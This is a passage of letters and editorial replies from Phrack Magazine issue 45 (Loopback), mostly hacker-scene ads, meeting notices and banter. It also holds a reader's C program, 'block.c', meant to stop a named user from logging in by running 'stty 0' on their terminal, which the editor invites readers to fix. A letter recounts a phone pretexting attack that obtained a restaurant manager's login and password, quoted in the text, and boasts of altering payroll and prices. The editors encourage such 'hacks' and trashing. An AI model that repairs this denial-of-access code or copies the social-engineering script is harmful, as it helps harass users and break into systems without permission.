  753. Commandment #8:  Exodus 20:15 (KJV) Thou shalt not steal.
  754.  
  755. Commandment #9:  Exodus 20:16 (KJV) Thou shalt not bear
  756.                  false witness against thy neighbour.
  757.  
  758. Commandment #10: Exodus 20:17 (KJV) Thou shalt not covet
  759.                  thy neighbour's house, thou shalt not
  760.                  covet thy neighbour's wife, nor his
  761.                  manservant, nor his maidservant, nor
  762.                  his ox, nor his ass, nor any thing that
  763.                  is thy neighbour's.
  764.  
  765. I also recommend that the following books be obtained and closely studied:
  766.  
  767.          The Great Controversy
  768.          By Ellen G. White
  769.          Review and Herald Publishing Association
  770.          Hagerstown, MD 21740
  771.  
  772.   The Desire of the Ages
  773.   By Ellen G. White
  774.   Review and Herald Publishing Association
  775.   Hagerstown, MD 21740
  776.  
  777.          Patriarchs and Prophets
  778.          By Ellen G. White
  779.          Review and Hearld Publishing Association
  780.          Hagerstown, MD 21740
  781.  
  782.   Daniel and the Revelation
  783.          By Uriah Smith
  784.          Review and Herald Publishing Association
  785.          Hagerstown, MD 21740
  786.  
  787. [Praise the Lord & Pass the Ammunition!]
  788.  
  789. ------------------------------------------------------------------------------
  790.  
  791.  
  792.   Big Brother Inside Logo
  793. A parody of the Intel's Logo modified for the Clipper Chip is now available
  794. for use for stickers, posters, brochures etc.
  795.  
  796. The Big Brother Inside graphic files are now available at the CPSR
  797. Internet Archive - ftp/gopher cpsr.org /cpsr/privacy/crypto/clipper
  798.  
  799. big_brother_inside_sticker.ps (postscript-scale to fit your project)
  800. big_brother_inside_logo.gif (Color GIF - good startup/background screen)
  801. big_brother_inside_picts_info.txt (Info on the files)
  802.  
  803. The files have also been uploaded to America Online in the Mac Telecom and
  804. Graphic Arts folders.
  805.  
  806. big_brother_inside_sticker.ps is a generic postscript file, created in
  807. CorelDraw. The postscript image lies landscape on the page, and consists
  808. of the intel-logo's ``swoosh'' and crayon-like lettering on the inside.
  809.  
  810. This design was originally created for the sticker project: the image was
  811. screened onto transparent stickers 1" square for the purpose of applying
  812. them to future clipper-chip products. (cdodhner@indirect.com was in charge
  813. of that project; as far as I know he's still distributing them for a small
  814. donation to cover printing & mailing costs).
  815.  
  816. The design was created by Matt Thomlinson <phantom@u.washington.edu>
  817.  
  818. [The stickers I have made a HUGE hit among the various "select targets"
  819.  at COMDEX.  Get yours and join in on the fun.  There are a world of
  820.  mass merchant distributors waiting to be "tagged."  Sounds like the
  821.  SenseReal foundation would love a handful of these for those pesky
  822.  Intel boxes.]
  823.  
  824. ------------------------------------------------------------------------------
  825.  
  826. HI,
  827.  
  828. 1st I want to thank you for dedicating your space to the silliness
  829. and foolishness that comes with anything Sara Gordon related.
  830.  
  831. I think I should have gotten the last word but, who wants to turn this
  832. into a public feud, specially with a demented middle aged woman.
  833.  
  834. Well, Thanks anyway for including the article, I have found people in
  835. the underground who believe what I am saying, as I have no monetary
  836. interest in this unlike Mrs. Gordon.
  837.  
  838. Kohntark.
  839.  
  840. [Well Kohntark, looks like you DID get the last word.  No, wait, I did.]
  841.  
  842. ------------------------------------------------------------------------------
  843.  
  844. Hello Chris,
  845.  
  846. I have a constant battle with some of my friends over who can ruin
  847. another person's display first.  Well, if I could log them out...
  848. However, I'm afraid the program doesn't compile.
  849.  
  850. Thanks for any light you might be able to shed on the matter.
  851.  
  852. Bye!
  853.  
  854.  
  855. I get these 3 errors:
  856.  
  857. "block.c", line 22.17: 1506-030 (S) Identifier open cannot be redeclared.
  858. "block.c", line 41.18: 1506-045 (S) Undeclared identifier user.
  859. "block.c", line 48.16: 1506-045 (S) Undeclared identifier W_OK.
  860.  
  861.  
  862. /* block.c -- prevent a user from logging in
  863.  * by Shooting Shark
  864.  * usage : block username [&]
  865.  * I suggest you run this in background.
  866.  */
  867.  
  868. #include <stdio.h>
  869. #include <utmp.h>
  870. #include <ctype.h>
  871. #include <termio.h>
  872. #include <fcntl.h>
  873.  
  874. #define W_OK2
  875. #define SLEEP5
  876. #define UTMP"/etc/utmp"
  877. #define TTY_PRE "/dev/"
  878.  
  879. main(ac,av)
  880. int ac;
  881. char *av[];
  882. {
  883. int target, fp, open();
  884. struct utmpuser;
  885. struct termio*opts;
  886. char buf[30], buf2[50];
  887.  
  888. if (ac != 2) {
  889. printf("usage : %s username\n",av[0]);
  890. exit(-1);
  891. }
  892.  
  893.  
  894. for (;;) {
  895.  
  896. if ((fp = open(UTMP,0)) == -1) {
  897. printf("fatal error!  cannot open %s.\n",UTMP);
  898. exit(-1);
  899. }
  900.  
  901.  
  902. while (read(fp, &user, sizeof user) > 0) {
  903. if (isprint(user.ut_name[0])) {
  904. if (!(strcmp(user.ut_name,av[1]))) {
  905.  
  906. printf("%s is logging in...",user.ut_name);
  907. sprintf(buf,"%s%s",TTY_PRE,user.ut_line);
  908. printf("%s\n",buf);
  909. if (access(buf,W_OK) == -1) {
  910. printf("failed - program aborting.\n");
  911. exit(-1);
  912. }
  913. else {
  914. if ((target = open(buf,O_WRONLY)) != EOF) {
  915. sprintf(buf2,"stty 0 > %s",buf);
  916. system(buf2);
  917. printf("killed.\n");
  918. sleep(10);
  919. }
  920.  
  921. } /* else */
  922. } /* if strcmp */
  923. } /* if isprint */
  924. } /* while */
  925. close(fp);
  926.  
  927. /*sleep(SLEEP);  */
  928.  
  929. } /* for */
  930.  
  931.  
  932. }
  933.  
  934. [Anyone want to take a crack at this??  Debug it and mail it back to us
  935.  so we can forward it on...]
  936.  
  937.  
  938. ------------------------------------------------------------------------------
  939.  
  940. xXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXx
  941.  
  942.                            IT'S BACK!!!!W$#@$#@$
  943.  
  944.  
  945.                              _-_-_-_-_-_-_-_-_
  946.                              (               )
  947.                               (    B00m    )
  948.                                 (        )
  949.                  CAU             (__  __)                CAU
  950.                                   __\/___
  951.            "We WiLL BloW     /---/|_____|\----\     uP YoUr CaR!"
  952.                              /CaU-__WuZ__-HeRe\-
  953.                                 (0)       (0)
  954.  
  955.  
  956.                                fARM R0Ad 666
  957.  
  958.      *fR666.something.com*     (713)855-0261      *fR666.something.com*
  959.  
  960.                     CAU-0b/GYN        SySoPs: EighT BaLL
  961.                   kCf-ThP-Phrack              M.C. Allah
  962.                 Bc0maP-d0S/2-Tone             Drunkfux
  963.  
  964.  
  965.      ' CAU Home                         ' Bc0maP Couriers Site
  966.      ' cDc Factory Direct Outlet(kCf)   ' 0b/GYN Member Site
  967.      ' USENET, InterNet E-Mail(s00n)    ' Hack/Phreak Discussions
  968.      ' Flashback Software               ' ToneLoc Distribution Site
  969.      ' 12oo-14.4 bps                    ' Exophasia Submission Site
  970.      ' 0PhiCiAl PHraCk DiSt Site        ' No Ratios for non dorks
  971.  
  972. xXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXx
  973.  
  974. [This is 8-Ball's bbs.  Call it and watch him shoot up.  Word.]
  975.  
  976. ------------------------------------------------------------------------------
  977.  
  978.  
  979.    Hackers, phone phreaks, techno-anarchists, cyberpunks, etc.
  980.  
  981.    * * * THE OFFICIAL U.K. '2600 Magazine' MONTHLY MEETINGS. * * *
  982.  
  983.    Meetings are held on the first Friday of each month.
  984.  
  985.    All those interested in attending will be required to meet at
  986.    the Trocadero shopping centre, which is a one minute walk from
  987.    the Picadilly Circus underground station, London.
  988.  
  989.    The meeting point is actually inside the shopping centre, next
  990.    to the Virtual Reality machines located on the bottom floor.
  991.  
  992.    Anyone interested in taking part should assemble next to these
  993.    machines between 7.00pm and 8.00pm.
  994.  
  995.    Those who attend will then travel by tube train to a 'unknown'
  996.    location for computer underground discussion, information
  997.    exchange, etc.
  998.  
  999.    For more information, phone 'Damian' on 071-262-3042, or send
  1000.    email to 'uabbs@works.com'
  1001.  
  1002.    Check page '46' of your latest '2600 Magazine' for details of
  1003.    other meeting locations, etc.
  1004.  
  1005.    2600 Magazine
  1006.    PO Box 752
  1007.    Middle Island
  1008.    NY 11953
  1009.    U.S.A.
  1010.  
  1011.    Tel: +1-516-751-2600 (24 hour answering system)
  1012.    Fax: +1-516-751-2608
  1013.  
  1014. --------------------------------------------------------------------------
  1015.  
  1016. This bulletin was created by 'Phantasm' on Tuesday 08-Feb-94 at 11:51pm.
  1017.  
  1018. [You brits:  GO TO THESE MEETINGS!  And go trashing afterwards!  And
  1019.  raise some hell.  Throw caution to the wind.  Be loud and obnoxious.
  1020.  Get thrown out.  (Just pretend you are Americans.  It works every time.) ]
  1021.  
  1022. ------------------------------------------------------------------------------
  1023.  
  1024. Hello,
  1025.  
  1026. I run a board here in the UK known as Unauthorised Access.  We have been
  1027. online since 1990 (the year of our anti-hacking law's approval) and the
  1028. system is now the largest computer underground board in the U.K. (2,000+
  1029. quality files and growing each day)
  1030.  
  1031. I also attended the HEU congress in Holland but although I spoke with
  1032. Eric Corley (2600) and BillSF (Hack-Tic), I did not know where to find
  1033. you.  I expect you dissappeared off to Amsterdam like so many of the
  1034. other visitors to Holland.
  1035.  
  1036. Anyway, I noticed in your last issue (44) that you seem to have quite a
  1037. few readers in the United Kingdom.  I would like to tell you about my
  1038. system here in the UK.  (Please include this advert in your next issue
  1039. of PHRACK)  Thanks!
  1040.  
  1041. Unauthorised Access
  1042. Online 10.00pm-7.00am GMT
  1043. Established 1990
  1044. Britain's largest computer underground system
  1045. 30+ message special interest groups
  1046. 2,000+ underground file online
  1047. c64/Amiga/IBM/ h/p util support
  1048. Running at 3oo/12oo/24oo/96oo HST
  1049. tel: +[44] 636-708063
  1050.  
  1051. SysOp: Phantasm
  1052.  
  1053. ----------------------------------------
  1054.  
  1055. [I always dig Overseas BBSes.  Unfortunately I couldn't get a strong line
  1056.  when I've tried to call.  Geez, you would think that in this age of
  1057.  fiber, I may be able to connect...but noooooo.  :)  ]
  1058.  
  1059. ------------------------------------------------------------------------------
  1060.  
  1061.    New TimeWasters T-shirts !
  1062.  
  1063. Do you know the feeling ? You're behind your terminal for hours,
  1064. browsing the directories of your school's UNIX system. Instead of
  1065. holes, bugs and bad file permissions you find tripwire, TCPwrapper and
  1066. s/key. You run a file with a s-bit and immediately you get a mail from
  1067. the system admin asking what you are doing. In other words, no chance
  1068. to ever become a good hacker there.
  1069.  
  1070. Now you have the chance to at least pretend to be an eleet
  1071. hacker. The Dutch hacking fanatics The TimeWasters have released
  1072. the third version of their cool 'hacker' T-shirt. Because
  1073. the previous versions were too limited (20 and 25 shirts) we
  1074. printed no less than 200 shirts this time.
  1075.  
  1076. Of course you want to know, what does it look like ?
  1077. On the front, a TimeWasters logo in color. Below that a picture
  1078. of two hacking dudes, hanging behind their equipment, also
  1079. featuring a stack of phracks, pizza boxes, beer, kodez, and
  1080. various computer-related stuff with a 'No WsWietse' sticker.
  1081. On the back, the original TimeWasters logo with the broken
  1082. clock. Below it, four original and dead funny real quotes
  1083. featuring the art of Time Wasting.
  1084.  
  1085. Wearing this shirt can only provoke one reaction; WOW !
  1086. Imagine going up to the helpdesk wearing this shirt and
  1087. keeping a straight face while asking a security question !
  1088.  
  1089. And for just $2 more you'll get a pair of sunglasses with
  1090. the text 'TimeWasters' on them !
  1091.  
  1092. To order:
  1093. Send $20 or $22 to
  1094.  TimeWasters
  1095.  Postbus 402
  1096.  5611 AK Eindhoven
  1097.  The Netherlands, Europe
  1098. This includes shipping. Please allow some time for delivery. If you
  1099. are in Holland, don't send US$, email the address below for the
  1100. price in guilders and our 'postbank' number.
  1101.  
  1102. For more information: email to:
  1103. - timewasters-request@win.tue.nl with subject: T-SHIRT for a txtfile
  1104.   with more info.
  1105. - rob@hacktic.nl or gigawalt@win.tue.nl for questions.
  1106.  
  1107. [I've got one Time Wasters shirt...Now I'm gonna have to get another.
  1108.  Wonder if they'll trade...I know this guy who makes some damn cool
  1109.  shirts... but the glasses are the clincher.  I'm ordering now.]
  1110.  
  1111. ------------------------------------------------------------------------------
  1112.                               ==Phrack Magazine==
  1113.  
  1114.                  Volume Five, Issue Forty-Five, File 3 of 28
  1115.  
  1116. ****************************************************************************
  1117.  
  1118.                            Phrack Loopback Part II
  1119.  
  1120. How sad the state of affairs is.  Companies do _not_ care about
  1121. security.  My father would be the last one to think about ways
  1122. into the "systems" that are out there.  We had a good talk tonite
  1123. about the lack of security in the corporate world.  I told him
  1124. about PGP public key encryption software, and it's political
  1125. gibberish etc.  Then he hits me with this outstanding story of
  1126. the stupidity displayed at his credit union (AEA, yes he works in
  1127. the silicon valley).  He went to get some $$ at the branch office
  1128. near his work, and he notices they have upgraded their computer
  1129. systems.  It was apparent that it was no 'internal' updating of
  1130. the tellers' equipment, but a major overhaul of the entire
  1131. structure at AEA credit union.  This was obvious when every teller
  1132. was reading manuals as they helped customers.  The greatest part
  1133. of his story (which made him laugh out loud) was that on the tellers'
  1134. computer screens were taped up pieces of paper detailing how to
  1135. access the computers at AEA.  As the teller was in the back room,
  1136. my dad leaned over and saw what it was, and memorized the things.
  1137. Its the things like that which make me want to trust my money to
  1138. fabulous behemoths like credit unions.
  1139.  
  1140. [That's typical.  You should have gone straight to that bank and taken notes.
  1141.  You never know...you could have ended up with SWIFT access.  Let's face it,
  1142.  if the BND's Project Rahab can, so can we.]
  1143.  
  1144. ------------------------------------------------------------------------------
  1145.  
  1146.      TO:  The Hack/Phreak Community
  1147.    From:  Amitech USA
  1148. Subject:  Explaining About What Amitech USA IS!
  1149.  
  1150.      Amitech is a group that teaches and learns... What I mean by this is
  1151. The Hack/Phreak community should teach the inexperienced more than put them
  1152. down, especially if they want to learn but no one is willing to teach
  1153. them.. This is were we come in... The definition of Hacking is learning the
  1154. holes in different telephone equipment and different computer equipment.
  1155. People these days don't use there knowledge correctly... They abuse what
  1156. they get and sometimes even harass people because of hatred and
  1157. reasons of revenge.. The H/P community isn't about this... We are releasing
  1158. this to invite anyone in the H/P community with a lot or little experience
  1159. to join us, to learn and to teach us..
  1160.  
  1161.      Amitech USA does not condone any board crashing, harassing,
  1162. Underground Board password stealing etc. We will not be responsible or
  1163. accept anyone who condones such activity....
  1164.  
  1165.      Amitech has two levels of members.. 1. Trial members 2. Regular
  1166. members. The trial members are on a basis of two weeks which in such time
  1167. they have to show us that they are willing to learn and is not into the
  1168. group just to use the groups name in there signature. Members decide who
  1169. is acceptable for a group and who is not. Each member will get the users
  1170. application except their real name and phone #. We will decide and will
  1171. contact you within a week of when the application comes to me...
  1172.  
  1173.      We are going to be mostly underground for the simple fact that the
  1174. group does not need recognition. Are members may stand out but for the
  1175. most part we will not be shown and or do not want to be shown for the
  1176. simple fact that underground is better for the newer user as will as the
  1177. older users.
  1178.  
  1179.      Please send all applications to Either burntkid@spiff.gnu.ai.mit.edu
  1180. or The Crime Scene 516-873-8903...Anyone who wants information may send a
  1181. message. Anyone interested in joining please fill out the application below.
  1182.  
  1183. First Name:               Handle:
  1184.  
  1185. Phone #:                  How many years experience:
  1186.  
  1187. Specialties:             Boards you're on:
  1188.  
  1189. Email/Internet:
  1190.  
  1191. Please Spread This Message Around...
  1192.  
  1193. [Good luck with your group.  And remember, when you're a group, you're
  1194.  subject to prosecution under RICO.  God Bless America.]
  1195.  
  1196. ------------------------------------------------------------------------------
  1197.  
  1198. Dear Phrack:
  1199.  
  1200.         I know you guys take an interest in what happens at 2600
  1201. meetings, so I thought you might like to hear about a mainstay of the
  1202. Washington D.C. meeting.   BTW, I am also submitting to 2600.  (They
  1203. should have a PGP key)
  1204.  
  1205. ------ Cut ----
  1206.         For the past few meetings a guy from MCI has showed up.  He
  1207. works at some sort of Pentagon City mall branch of MCI and on the Fridays
  1208. he sticks around and gets drunk.  He is usually a great source of
  1209. entertainment and this time he was undoubtedly the best part of the 2600
  1210. meeting.  That was the highest form of entertainment (except for the
  1211. threats on The Monk's life).  At a meeting before this he was saying
  1212. (I'm not sure how many beers he had had) how he was going to bomb
  1213. (physically) all the hackers computers by using the system batteries.
  1214. And he also said something like "We didn't have time for this kind of
  1215. stuff in Vietnam."  Anyway, I was listening to his drunken ramblings and
  1216. I was thinking "I should be writing his wisdom down."  So I did, and
  1217. Maverick later started to type it down.  The hardest part of all of this
  1218. was not laughing in his face.   Here is where I started the notes:
  1219.  
  1220. MCI Guy:  I mean it's really small, it's only like 1 microliter long.
  1221. Vance:    Yeah, that's pretty short.
  1222. MCI Guy:  I work on computers and they go in nanoseconds.
  1223. Vance:    Nanoseconds are really short.
  1224. MCI Guy:  A nanosecond is about this long.
  1225.           < Denotes with his fingers a length of about 6 inches >
  1226. Vance:    That's great if you can visualize it.
  1227. MCI Guy:  Yeah, it's short.  Most of the instructions that I do take
  1228.           less than 3 nanoseconds, and that's short.  But it's still too
  1229.           slow.
  1230.  
  1231. ---  Ok, from here it somehow jumped to a discussion of Rebel Lion's
  1232.      modem that was sitting out:
  1233.  
  1234. MCI Guy:  That's a good modem, it has memory because of it's external
  1235.           capacitance.  The capacitor can store the memory since it's
  1236.           outside.
  1237. Vance:    Yeah, it must have a lot of memory.  How much would you say?
  1238. MCI Guy:  A lot, gigabytes of it.  The computer can talk directly to it.
  1239. Vance:    You need software to access that, that's where the
  1240.           intelligence is, in 2 gigabyte capacitor technology software.
  1241. MCI Guy:  It's because it's outside and it has it's memory.
  1242. Vance:    Gigaboobs of memory.  Megamammaries.   It must have
  1243.           Megamammaries in it's external capacitance.
  1244.  
  1245. --  At this point, everybody is cracking up, I can't believe Vance kept
  1246.     a straight face.
  1247.  
  1248. MCI Guy:  Yeah.  < Looking confused. >
  1249.  
  1250.  
  1251. -------------------------------------------------------------------------
  1252. -- After this, I was really laughing and wasn't sure of exactly what was
  1253.    said.  But in just a few minutes, the MCI guy left to get some more
  1254.    beer.  He didn't come back to our table, he went to another one.  We
  1255.    ignored him for awhile.  But as he was sitting there, a woman sat down
  1256.    next to him.  She was undoubtedly a prostitute, and there were many
  1257.    cracks about her gigaboobs and megamammaries.  She must have spotted
  1258.    the fact that he was wasted and was trying to make some easy cash.
  1259.    After a while, the MCI guy didn't bite, and her pimp came along and
  1260.    picked her up.   (There is no other logical explanation that I can
  1261.    think of.)  After a few minutes, we went back to the table for the
  1262.    final round, but Vance had left, so I conducted the search for
  1263.    knowledge.  It starts as I was approaching the table and trying to get
  1264.    him to talk to me.
  1265.  
  1266. GD:       When you were talking Rebel Lion's modem, I wasn't quite sure
  1267.           of what you said, could you explain it to me?
  1268.           < I get out my pencil and paper, like I'm taking notes on his
  1269.           every word. (Actually I was) >
  1270. MCI Guy:  < He is giving me a look of utter contempt, like I'm just a
  1271.           stupid kid who is not worthy to partake in his knowledge >
  1272.           Well you see it's external.
  1273. GD:       What do you mean?  It's obviously external, but what does that
  1274.           mean?  < Gives me another look >
  1275. --- Maverick accidentally spills some of Mr. MCI's beer.
  1276. MCI Guy:  What was that?  What are you doing?!?
  1277. Maverick: I didn't do anything, you spilled it!
  1278. MCI Guy:  < Just forgets about it in his drunken stupor >
  1279.           It has it's own memory, it doesn't have to take up the core
  1280.           like an internal.
  1281. GD:       Core?
  1282. MCI Guy:  Or something like that, you know.  It's outside the main
  1283.           frame.
  1284. GD:       Right, so it saves memory.
  1285. MCI Guy:  Hmmph, I work with so much memory.  I throw out tapes.
  1286. GD:       Tapes?  You mean tape backups.
  1287. MCI Guy:  Yeah.
  1288. GD:       Why?  Don't you want the memory?
  1289. MCI Guy:  I have too much memory.
  1290. GD:       Yeah, I guess you're right, if you have too much memory, it is
  1291.           hard to get rid of.
  1292. MCI Guy:  I even use records.
  1293. GD:       You mean like the spinning kind of records?  On a turntable?
  1294. MCI Guy:  Yeah, they hold a lot of memory.
  1295. GD:       Why don't you use CD's?  They hold a lot more you know.
  1296. MCI Guy:  No they don't, you don't even know.
  1297. GD:       So you are saying that records hold more than CD's?
  1298. MCI Guy:  Yeah, and I can save space on records, I use "shrinker".  It
  1299.           shrinks the space on a record.
  1300. GD:       You mean shrink the space on one of those spinning records?
  1301.           < I was trying too hard to keep from laughing to speak
  1302.           articulately >
  1303. MCI Guy:  It saves space by shrinking everything, and I can fit
  1304.           more on it.
  1305. GD:       Yeah, I guess that is a good idea.
  1306. MCI Guy:  < Incredulous at my stupidity >
  1307.           Do you even know about comp?
  1308. GD:       Comp?  Sorry, I've never heard of "comp".  What is it?
  1309. MCI Guy:  It's bits and bytes.
  1310. GD:       Keep on going, I want to learn about this.
  1311.           < And boy did I >
  1312. MCI Guy:  4 bytes make a bit, 2 bytes make a double word, 2 words make a
  1313.           double word.
  1314. GD:       2 words make a double word?   Isn't that obvious since 2 means
  1315.           double?
  1316. MCI Guy:  < Ignoring me >
  1317.           It's called 32 bits.  Above that you have to deal with 36 bits.
  1318. GD:       Ok, I get it.  That's pretty cool.
  1319. MCI Guy:  That's called the IBM logo.
  1320. GD:       The IBM logo?   It's made up of bits and bytes and comp?
  1321. MCI Guy:  Yeah, if you go above or below the line.
  1322.  
  1323. ---  Ok, at this point I was reeling from the bit-byte-word conversions
  1324. and I didn't even want to try pursuing the "line" question since I had
  1325. to leave.  I really wish I could have stayed, but I also don't know how
  1326. long he would have been benign; this guy was drunk and still had 2
  1327. large beers in front of him.
  1328.  
  1329.         All through this time, people were cracking up and laughing
  1330. in his face.  It wasn't that hard for the guy currently talking to him
  1331. to not laugh, but when you thought for a second about this guy's slurred
  1332. speech and his look of superiority, it was damn hard not to laugh.  And
  1333. how sad is this guys life?  He comes to a mall to get drunk!  It
  1334. must cost him $15 for those beers.  Oh well, maybe we will spring for
  1335. some grain alcohol next time so we can get him to say even more.
  1336.  
  1337.         Last thing, if you are talking to a guy like this.  Don't do
  1338. what I did, don't confront him.  You won't get as much out of him.  Do
  1339. what Vance did; agree with everything he says.  This will get him more
  1340. comfortable and he will talk more.  Then give a summary of everything he
  1341. said, while inserting things like "megamammaries" and "gigaboobs".
  1342.  
  1343. -- Disclaimer:  I tried to be as accurate as possible but there were
  1344. some small changes made because I couldn't remember the exact wording.
  1345. But overall this is fairly true to life.
  1346.  
  1347. [I've noticed that everyone I've ever met involved with LE or security
  1348.  at corporations drinks and drinks and drinks and drinks.  And drinks.
  1349.  What's with that?  Jesus...no wonder they are so slow to react.  They
  1350.  are fucking hammered all the time.  They need to invest in some
  1351.  stimulants.  Swap that Gin & Tonic for a handful of Ephedrine or something.
  1352.  (Notice I said Ephedrine...gotta stay legal, eh?) ]
  1353.  
  1354. ------------------------------------------------------------------------------
  1355.  
  1356.  
  1357.  Dear Phrack,
  1358.  
  1359.   I am Knightkrawler.  About a month ago Mephisto, a fellow hacker friend of
  1360.  mine, discovered a dialup for a Taco Bell computer while scanning some
  1361.  numbers.  Just for the hell of it, I called up the Taco Bell manager and
  1362.  posed as the Sys Admin.  THE PHUCKER FELL FOR IT!!!!!!
  1363.  
  1364.  Conversation
  1365.  ^^^^^^^^^^^^
  1366.  
  1367.  me: Hi, I'm the SYS Admin for The Taco Bell Login.  My staff and I will be
  1368.  running some routine diagnostics for the next week.  I'll need a passwd and
  1369.  login name to enter the system.
  1370.  
  1371.  Corey (the manager): Sure! My passwd is 1A2B3C, and my login name is Corey.
  1372.  
  1373.  me: Thank you. If you need anything, you know where to reach me.
  1374.  
  1375.  END
  1376.  ^^^
  1377.  
  1378.  WHAT A DUMBASS!!! I was able to log on and Change fuckin' payrolls!!!!
  1379.  First thing I did was to change the price of tacos to 5 cents a piece!
  1380.  
  1381.   What I want to know is, have any of you out there had any similar
  1382.  experiences with bastards like these? Are all restaurant managers so
  1383.  lame?
  1384.  
  1385.                                L8R,
  1386.                                 -=KnIgHtKrAwLeR=-
  1387.  
  1388.  
  1389. [The Taco Bell SCO's have been a source of amusement for some time.
  1390.  It would appear that all restaurants in the PepsiCo chain have
  1391.  SCO's in-house.  Something to keep in mind.
  1392.  
  1393.  And, uh, I've never seen anything that you could do like "change prices"
  1394.  without special terminal emulation.  So, uh, don't bullshit a bullshitter.
  1395.  But, hey, it's a funny hack, and there are several in every city to
  1396.  play with, if you are so inclined.]
  1397.  
  1398. ------------------------------------------------------------------------------
  1399.  
  1400.  Hello there, I was wondering if you could help me (wait, wait,
  1401. hear me out!).  I am looking for some up-to-date info on COSMOS.  I've read
  1402. all of the Phrack articles, yours in ish 31 was particularly good, and I was
  1403. wondering if there have been any developments lately that I should be aware
  1404. of?
  1405.  Basically, I am looking for a manual that will show me how to use
  1406. COSMOS.  Kind of like a DOS reference guide or something similar.  Your
  1407. article was dated 1990, almost 4 years ago, and I'm sure there have been
  1408. some new things introduced since then.
  1409.  I was thinking that if you had the raw info, you could pass it
  1410. along to me and I could whip up a readable format for the next issue of
  1411. Phrack.  Believe me, I've got far too much time on my hands.  I love Phrack
  1412. and would do anything to help out!  Anyway, I'll cut this off here before I
  1413. waste too much of your time.
  1414.  
  1415. Mr. Wizard
  1416.  
  1417. [COSMOS is being phased out.  I would suggest you look for info on
  1418.  SWITCH.  There have been some articles on it in 2600, so you may want
  1419.  to check some back issues.  Otherwise, I'll see if I can't get some
  1420.  more detailed articles on its use for future Phrack issues.
  1421.  
  1422.  But as far as COSMOS goes, I think my article from a few years back ended
  1423.  up as the most complete ever done, so I doubt there are any others that
  1424.  covered things I didn't.]
  1425.  
  1426. ------------------------------------------------------------------------------
  1427.  
  1428. VIRTUAL REALITY NOW AVAILABLE TO GENERAL PUBLIC AT CYBERMIND
  1429.  
  1430. What is Virtual Reality?
  1431.  
  1432. Virtual Reality (VR) is a computer generated, interactive 3D environment in
  1433. which the computer serves as a window to an alternate reality.  Once immersed in
  1434. this environment, the players interact with each other as well as the computer.
  1435.  
  1436. Each VR system includes a head mounted display which provides a 3D graphical
  1437. image along with full stereo sound.  By placing the display over your eyes, you
  1438. are "virtually" transported to a computer-generated world that you control.
  1439. Wherever you move, the computer tracks the movement of your body and displays
  1440. the appropriate image to your eyes.  (If you looked up you would see the sky.
  1441. If you looked down you would see your "feet.")  The unlimited choices you can
  1442. make in these virtual worlds make the experience one-of-a-kind.
  1443.  
  1444. Development of Virtual Reality: Past and Future
  1445.  
  1446. Early VR was confined to multi-million dollar systems in research labs and
  1447. military simulations.  However, the decreasing cost of computing power and
  1448. display technology, VR now has more widespread applications: entertainment,
  1449. education, worker training, telerobotics, medicine, teledildonics (virtual sex)
  1450. and communication, among others.
  1451.  
  1452. In the future, VR technology will allow you to travel, shake hands with people
  1453. in other countries, walk on the moon or go shopping -- all without actually
  1454. leaving the home or office.
  1455.  
  1456. What is CyberMind?
  1457.  
  1458. CyberMind is San Francisco's first location-based virtual reality entertainment
  1459. center.  CyberMind center features eight interactive virtual reality machines
  1460. that allow the general public to experience and learn about 3D virtual reality
  1461. technology by playing imaginative, roleplaying games such as Dactyl Nightmare,
  1462. Legend Quest, Flying Aces and ExoRex II.
  1463.  
  1464. CyberMind Virtual Reality Center
  1465.  
  1466. WHAT: Out of this world entertainment for families, couples, singles and groups.
  1467.  
  1468. WHERE: One Embarcadero, Lobby Level (second floor).  At the top of the
  1469. escalators.
  1470.  
  1471. WHEN:  Normal Center Hours are 10:00 am to Midnight, seven days a week.
  1472.  
  1473. HOW MUCH: Normal Pricing is $5.00 per play per person for a six minute
  1474. experience.
  1475.  
  1476.       20% discount for groups over 12 persons.
  1477.  
  1478.       CYBERMIND CENTER RENTALS: For catered parties and receptions, contact
  1479. Chris Figge at 415.693.0861
  1480.  
  1481. WHY: It will blow your mind
  1482.  
  1483.  
  1484. CyberMind Corp: Telephone 415.693.0861.  FAX: 415.693.0171.
  1485. 737 Pine Street, Suite 65, San Francisco, CA  94108
  1486.  
  1487. [Uh, yeah.  And Stand in line with Beavis & Butthead.  Huh Huh, Cyber Stuff
  1488.  is cool.  Heh heh.  Cool.  Yeah, I'm a Cyberpunk with $5 dollars.  Let's set
  1489.  it on fire and throw it in the street.  No, Ass Munch, you can get stuff
  1490.  with money.   Oh yeah, heh heh heh.]
  1491.  
  1492. ------------------------------------------------------------------------------
  1493.  
  1494. Phrack:
  1495.         Sorry to inconvenience you and PGP this message, but I fail to trust
  1496. the people in charge of the server in which this message is being sent from.
  1497.         Approximately six months ago I was playing around with the idea for a
  1498. crypto-chat program.  In short:  You and the other people in the chat area,
  1499. (IRC for example), would pick the same password or random seed number.  This
  1500. would tell the chat program what algorithms to use, etc.  Hence forth whatever
  1501. you type is encrypted and whatever is displayed remotely is automatically
  1502. decrypted.
  1503.         My only problem is that I do not know enough regarding cryptology to
  1504. write a very secure encryption routine.  I have tried a few times to contact
  1505. Cypherpunks, but to no avail, I have not received any letters back from them
  1506. even regarding my request to be put on their mailing list.  I write to you,
  1507. Phrack, in hopes that you can set me in the correct direction for making my
  1508. crypto-chat program a reality.  I feel it would be an asset to the hack/phreak
  1509. community and its struggle for more privacy.
  1510.  
  1511.                         Thanx.
  1512. -----------------------------------------guerilla AnArchy---------------------
  1513.  
  1514. [Actually, it wouldn't be that hard to do, but you'd probably want to do
  1515.  it as a DCC chat type thing, rather than going through a server at all.
  1516.  
  1517.  I may be wrong, but I think someone may have worked on such a beast.
  1518.  You may want to try again to contact the cypherpunks list
  1519.  (cypherpunks@toad.com) (or to get added, cypherpunks-request@toad.com)
  1520.  and ask around.  Otherwise, use the existing DCC Chat source, but
  1521.  just change it to incorporate a public key exchange, and use those
  1522.  exchanged keys to encrypt messages.  It would be harder for more than
  1523.  one to one chat, but hell...no pain, no gain.
  1524.  
  1525.  Notice, I didn't volunteer to do it.  Much too much work for me.]
  1526.  
  1527. ------------------------------------------------------------------------------
  1528.  
  1529. Dear Phrack,
  1530.  
  1531. Just finished reading Issue #42 (so I'm a little behind).  Must say,
  1532. it was very kewl.  I have a little addition to the "Car Light Hack"
  1533. in the Loopback section.  When coming up to an intersection with the
  1534. pressure sensitive panels in the tar, pump the brakes hard so the
